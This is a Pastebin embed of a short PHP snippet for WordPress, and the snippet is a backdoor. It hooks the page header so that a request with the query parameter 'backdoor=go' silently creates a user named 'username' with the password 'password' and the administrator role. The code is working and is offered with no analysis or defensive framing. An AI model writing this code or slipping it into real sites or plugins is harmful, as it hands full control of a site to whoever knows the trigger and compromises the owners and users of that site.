document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?php
  2. add_action(\'wp_head\', \'holeinthewall\');
  3.  
  4. function holeinthewall() {
  5.     If ($_GET[\'backdoor\'] == \'go\') {
  6.         require(\'wp-includes/registration.php\');
  7.         If (!username_exists(\'username\')) {
  8.             $user_id = wp_create_user(\'username\', \'password\');
  9.             $user = new WP_User($user_id);
  10.             $user->set_role(\'administrator\');
  11.         }
  12.     }
  13. }
  14. ?>
');